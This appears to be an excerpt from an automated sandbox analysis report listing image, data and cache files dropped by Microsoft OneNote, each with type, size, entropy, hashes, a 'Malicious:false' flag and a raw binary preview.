                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.327674242198577
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Yu2RspKdPnTvtlvE/rEya7tXsX49rJjdRrd3r7NxB9RXj43gtF/q3sHcI:YzRsePnTvrvKrEyaJX849rJjRbF95
                                                                                                                                                                                                              MD5:0BCD7C3EB29FBC7C582007E9E333AC70
                                                                                                                                                                                                              SHA1:509BE1B4F1A4977AFD59157900C891AE23F4F4FB
                                                                                                                                                                                                              SHA-256:D909F644CE501A96D95C879A55D0EDD5CAB3F3E87F2FEF14EA8750892C9C0C38
                                                                                                                                                                                                              SHA-512:38A22FD26B968AB84CD4FDCD8F96EC04BF02377A8BA318575673B0DA1E99BF5B73719E18EF988BFEFE91063D4B9F82F340B4CA345AC130B549E4496F0EFA9307
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ).......)...(z........)...(z........)....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................S....4....5.....N...^.................%zf.,I.$1.G..........f........................................I.qk..B.....LZ...............S....4....5............S....4....5..........).......).......)...........................................)..j....)..T.]..).......)....B..)..H....)....B..)....>.))....J...................;........4...4...4.."..............)...)...)....z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........).......)......#)..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39010
                                                                                                                                                                                                              Entropy (8bit):7.362726513389497
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                              MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                              SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                              SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                              SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.426535164318094
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zWCsnUwgUdWT4dt0lS9tEzuEr+lXpXWkk5p9uzuDj4Brd3rgxShdX2U22WD9:Zs+UUT4dtcS9WKEiZX9G9IKcRbHhjG
                                                                                                                                                                                                              MD5:C3BBEE85760E1D6675AB1E759BBB8DE9
                                                                                                                                                                                                              SHA1:0516656D38A0725E1913B216D0ADCE7FE9D366BC
                                                                                                                                                                                                              SHA-256:BE92862F04DCBADFE15022682D29A82C386B3A122E67827706451B7636CA0000
                                                                                                                                                                                                              SHA-512:EB503A5430E268EB6798E176041B75769E0BE9B7A6979EA1D69ECE0D59EAA78DCDC3861F5CCB1819D5976165BAC32BD8C4BD54FD42AA9B97786BD2DD2B90D277
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.m.......m.]]I......x\<..m.]]I......x\<..m...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............e..t...+.v.........N...^................k..<..B....6>..........f........................................I.qk..B.....LZ.............e..t...+.v..............e..t...+.v...............m.......m.......m...........................................m.j.....m.T.]...m.......m...B...m.H.....m...B...m...>.).m...J...................;........4...4...4.."...............m...m...m...z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........m.......m.....#.m.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25622
                                                                                                                                                                                                              Entropy (8bit):7.058784902089801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                              MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                              SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                              SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                              SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.332292459554775
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Y1jnsi/VMQz7T4FMEmNXU98psRbHcV8cgi4:WsAz7TqpmNXU98psRbH
                                                                                                                                                                                                              MD5:65D91B24EFC855A3B12A4ED6975FFD14
                                                                                                                                                                                                              SHA1:9AEA555EE479BE8921AB9936F2C0853AAD4D6BE5
                                                                                                                                                                                                              SHA-256:8FA98B361EF8B91A4166C2440746901298DCE431BD390F64AC6C9AE65E76B728
                                                                                                                                                                                                              SHA-512:1071E80511A919B2303FE97577DB8BC9EFA88B179A6B7CCA04E1D19BAF7FDD621754798D6C30BD9B33C08A804621FF5BAAFBB97A3A022D36A62741EB774E44A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.._......._.Ylq..,...e..._.Ylq..,...e..._..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............jY7`.....`.(..d....N...^...............mZ}B...E...............f........................................I.qk..B.....LZ.............jY7`.....`.(..d.........jY7`.....`.(..d..........._......._......._..........................................._j......_T.]...._......._..B...._H......_..B...._..>.).._..J...................;........4...4...4.."................_..._..._..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........._......._....#.._............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2033
                                                                                                                                                                                                              Entropy (8bit):6.8741208714657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                                                                                                                              MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                                                                                                                              SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                                                                                                                              SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                                                                                                                              SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.547286021255523
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:KU3fsV3g+btTD6wwEkJLseXVee9Iwj41rd3rcxixdXgXmI931:KQfsVQ+bxOE84eXUe9IwYRbdxK
                                                                                                                                                                                                              MD5:5CC41637D343B107A6608FB01326AB48
                                                                                                                                                                                                              SHA1:ED1A84C7CDB0D303036DA5D842F5290873434C25
                                                                                                                                                                                                              SHA-256:53CABB8263E7CAB95B828200D09AA48948D25B0E0D3F680D31B90636AAAAC141
                                                                                                                                                                                                              SHA-512:F156F9C4CA9062C0EE57D091B7A520F852EEE1515C996482FD3E39BF2020B99EFD97AD36B00AE0BCD19DD198F7CFFAD5111ADCB06F67F060E8E3250ABD497BC8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:6...B...,.......R.......................................................................................................................................6...B...f.......R................................I.qk..B.....LZ..............,uH.:..!.)...-..........,uH.:..!.)...-....6...B.......~...R.............................I.......I...................................................I.t.....I................................................................4..'...'.......................................................................~..............................................................................................I.qk..B.....LZ....*.........|.......|.......|...........................................|.j.....|.T.]...|.......|..B...|.H.....|...B...|...>.).|...J...................;........4...4...4.."...............|...|...|...z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........|.......|.....#.|.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55804
                                                                                                                                                                                                              Entropy (8bit):7.433623355028275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                              MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                              SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                              SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                              SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):2.6010958865432343
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:pB7s98SydNDpggUlHWi3duVUlX1Uku4PWUl+9JgBOUliMpNAB26O5Ul3SD8:p+SBdNGl24llUYDl+3Ilx/As7KlCD8
                                                                                                                                                                                                              MD5:58DB671716AA66B135C9ECAE75D2BF40
                                                                                                                                                                                                              SHA1:62D07CC2E1C650F876586392536F30EA47C54943
                                                                                                                                                                                                              SHA-256:612C3B0D953A21BEBE39486A1F8A0C3616CD1A5DEA946F19B5D726EDFC0FB9D7
                                                                                                                                                                                                              SHA-512:C1705391A4138EE1561176676AD62DD67F1094E3493401CEE934BD2F25DC24076E5B116DB9D7A530D5CA56B0EEA6C1120C1C1AB52A6CF7A7D848F2FCDB71988C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......................................?...~.............................................................................................................................................................vm......vm..B`...4.a..jQ..............|F.{..%V./..........m..;.$....vm..B`...4.a..jQvm..E.bZo.U.7...h...E.b...........................................................................m.....`........7......Q......]......e......q....................4..~...1...(...(.......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.T.e.m.p.l.a.t.e.s.\.1.0.3.3.\.O.N.E.N.O.T.E.\.1.6.\.S.t.a.t.i.o.n.e.r.y.......S.t.a.t.i.o.n.e.r.y.............1.......S.t.a.t.i.o.n.e.r.y................1... ..$....S.t.a.t.i.o.n.e.r.y.......Oj3.....Oj3'1?T....o................L...?..K.2......."...R.......................Oj3.E.b.............................E.b..c..,.......................E.b..c..,0...........}..t.SuM.;T...%V......................1... ..$....S.t.a.t.i.o.n.e.r.y...........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.045379024174986
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:/zyfhTOzhSxWJ/wMJKl/ilCgJiltV5xil6UgcQTllzcQED:/kTiSAJ/zogwV56ga
                                                                                                                                                                                                              MD5:3EE9CB433572B223A2D3F76DBD141FE9
                                                                                                                                                                                                              SHA1:6E2A53C87A300B9FF9182B39B2FB8E5B8A5C0169
                                                                                                                                                                                                              SHA-256:7862C0F02C9D12068E10AB42172EA89EDF6BC6D427AA586E8D0E1F820DA56EF3
                                                                                                                                                                                                              SHA-512:8034A6021C72905460EEAB6CE9D3821F1902D3E63464BC9AC13064988C96DB9479AC55634DFD9AF20EEB3DDB9364599578F695755127E40E58887A891CDE6337
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...................................................................................................................................................................................................48......48.;.".E......G.Y.......Y......C....X~W.Y......C....X~W.Y...qh7.7..C.....r.Bqh7.48.;.".E......G.48...........qh7.....qh7.................................................qh7..(..qh7`....Y..N.2....................................................4..~...1...(...(...h...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.T.e.m.p.l.a.t.e.s.......T.e.m.p.l.a.t.e.s...............1.......T.e.m.p.l.a.t.e.s..............Y....1... ..$....T.e.m.p.l.a.t.e.s.........qh7.....qh7.7..C.....r.BY.......Y......C....X~W.2...............................48.......................................48...c..,..............n......B...,.g......N...^...........................................................................................................n......B...,.g..............
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7459003925177762
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:DaC+Ata/IAYMnivD0XDwVhEiDwVhKrBWDwVhoAYQEjaAk:OSta/Isni7rVh6VgBpVAH
                                                                                                                                                                                                              MD5:FD1FF2A8BE7E485AFD94886EA0708AEF
                                                                                                                                                                                                              SHA1:91C4D56407846C39469CF95F35C136FEBE79E9D6
                                                                                                                                                                                                              SHA-256:250F30B77626A2CA9543DE18DDF0654C763139A509411F68CC05015DE89151BA
                                                                                                                                                                                                              SHA-512:89E75251359A2AB761A034537ED3932E8E81B9AE10D58B7007A887C95E5E82422C9F5F7D124DC30CA23746EB2F076E6365D5B4CF1BF34B0228D0D1E4A23EB631
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..........................?..........................................................................................................................................................................G.......G.~.uE.n.#.W..].......].4.J.I..../..s..G.~.uE.n.#.W....G..].4.J.I..../..s.].................................G.......G...................................................G..#....G\......GN.!....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...........1.......L.i.v.e.C.o.n.t.e.n.t...............]...c..,.....................G..1... ..$....L.i.v.e.C.o.n.t.e.n.t.............e.k.1.B...Q........N...^...........................................................................................................e.k.1.B...Q........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9145891837749062
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:9/RssLhanFvkLVa3hFL16VbjqcptdwnjTjls6x8MHAjoChdVf1tlc3loHWA+axlX:zPLcoV8V6VqqGDAdVNXc1n2cQEj0
                                                                                                                                                                                                              MD5:FB0673D9FB7D404A46B0949B7C3E3C8E
                                                                                                                                                                                                              SHA1:35AA8185B0C6FA53283064C7FB7D23564222FA3E
                                                                                                                                                                                                              SHA-256:6B55DC7FFF73C13B839A79DCD9E576B698C83665CC6A0C1EC652BEC0AF9769B5
                                                                                                                                                                                                              SHA-512:9A540F41F551F3DDF182AEDBA8E8DE183A05F5BB8761966C35D8339CB644AD53F55A48EBA5442FEC3A73D1D074AB2B096FF5D737B862469F49E510205E1CB880
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...................................................................................................................................................................................................ww`.....ww`..oYD.\.....K............sHO.8.D...ww`..oYD.\.....Kww`......J.._.nzT........sHO.8.D..M.............ww`.....ww`.................................................ww`..+..ww`\....ww`N....ww`N.)...............................................c..,.........................4..1...(...(.......1.6............ww`..1... ..$....1.6...................J.._.nzT.............sHO.8.D..M2...............................ww`..........................................c..,...................ww`.ww`..1... ..$....1.6............}].h.|N.c:.P.......N...^............................................................................................................}].h.|N.c:.P...............................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.6105573137106526
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:8LhxhIZngWlE8xeLWVglWLVPxhluLTlB:ucdgyE8UchAB
                                                                                                                                                                                                              MD5:8134D3844A0799E37AC4BA1EBDC8B1C7
                                                                                                                                                                                                              SHA1:D50C4B36363DF608CF7F9F10F152F5D39E6CD65E
                                                                                                                                                                                                              SHA-256:481B8C4C25039616863755AE43C4838EDD9C6278BE4A48709913373C8EB7E56F
                                                                                                                                                                                                              SHA-512:3C79045241EFEB788D20371E69A84C85341B5A7214531E66A1CAD40F4D763184C8659F7DE025519D77ED55934B4E4C31D5D265A277EE2C670B0F0A08AF479533
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........6.......".......................................................................................................................................................................................62......62...X/C.Z..i<Al~.y.....~.y}...L...f.~..62...X/C.Z..i<Al62....Zs{K.F.2..{.....Z.~.y}...L...f.~.9~.y..........62......62..................................................62...E..62.\....62.N....62.N.*..62.N.:..62.N.C..........................~.y..c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........62...1... ..$....M.a.n.a.g.e.d...............Z.......Zs{K.F.2..{...~.y.....~.y}...L...f.~..2...............................62....Z...i................................i..c..,...................62..62...1... ..$....M.a.n.a.g.e.d...........i.......i.u.I.k.U....~.y.....~.y}...L...f.~....i.u.I.k.U......i.~.y}...L...f.~.9~.y.\w..q.O...@z...\w......>.................Zs{K.F.2..{..............................................Z..c..,...................62..62..62...1... ..$....M.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7202025698320378
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KJTPTOXODHOXTW+l+Xn2D9Xl1A7lwQEC7lM:UqeDu+X2D9+lwUl
                                                                                                                                                                                                              MD5:ADAD077CD3CE35248B3707DD06EE2782
                                                                                                                                                                                                              SHA1:FB03D348FF8C87B924EC8143888DE30CBA85B98D
                                                                                                                                                                                                              SHA-256:2AE3AE916B2264A13B76F050DFBD8582C8C750A1402BB695FD41D8D3F41D3F13
                                                                                                                                                                                                              SHA-512:46265C03A48F66245D71DC85D8D8997C3DF75CA203A86E4DF91C58EF1373D4D0A17F700C8B01980E7E5E8EA5C5CEAFCF51F11DC505D215AD75DB05641B75A029
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................-E......-E...>@.P.mj)..............K..~:5.6.-E...>@.P.mj)..-E......K..~:5.6...................................................................................................!.....\.......N....................................................-E...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.............1j....2G..J..?.....N...^...........................................................................................................1j....2G..J..?.............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47970405622285817
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTc2ozl80sEt/Bl/lyLx8Olu3afeTy+fw1EZTy+T:VcDu0xftlV38eTy4QEZTyE
                                                                                                                                                                                                              MD5:CC8D469A80141D093BFEAE144DDDA2E8
                                                                                                                                                                                                              SHA1:32462C20C71F06EFA7B5DBAB8A44E979CBBE595D
                                                                                                                                                                                                              SHA-256:D004A6F832CA8F9B21F8D5F1F283A6FFE7D8C092DB267C16BA52A9AEAE5FCA0E
                                                                                                                                                                                                              SHA-512:C0104DC2CF4A380C26EDFFDC2709DE7D7BE928E42715A59A6CB8FF1D968566106457E9D60CDEDC704F18303C3C71FFEE7C1E1F33D84EC66FDE4B16B00C2ACBE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................o.......o......E..._..M.........................o......E..._..M.o....................................................o.......o...................................................o.......o..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....v.7..QO....9.L.....N...^............................................................................................................v.7..QO....9.L.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7256883123296698
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:K0nCXjHAJbakalLyLDyXNgJydehx8felBkls0C67elBkls0317nw1Elr:KUCXjgAGLDSNHkWeIW67eIWc1jQEl
                                                                                                                                                                                                              MD5:3F0C210D399448A90A70143E704374FD
                                                                                                                                                                                                              SHA1:7688B1FC07806F06E4EA9C59EA961C80E71CAFE2
                                                                                                                                                                                                              SHA-256:C048CA3DA580192F3C3C055A503303381DA0F171B10FD93F8F0E7D7D345610AE
                                                                                                                                                                                                              SHA-512:614FF2A1740306A791F763568F08BFB4F51581912B3FE7272D3E08CF867384090653B6267A85945A0AADD001779BF97DC3AA0CA71BA17C06ADC66AE0FA1F5BE5
                                                                                                                                                                                                              Malicious:false
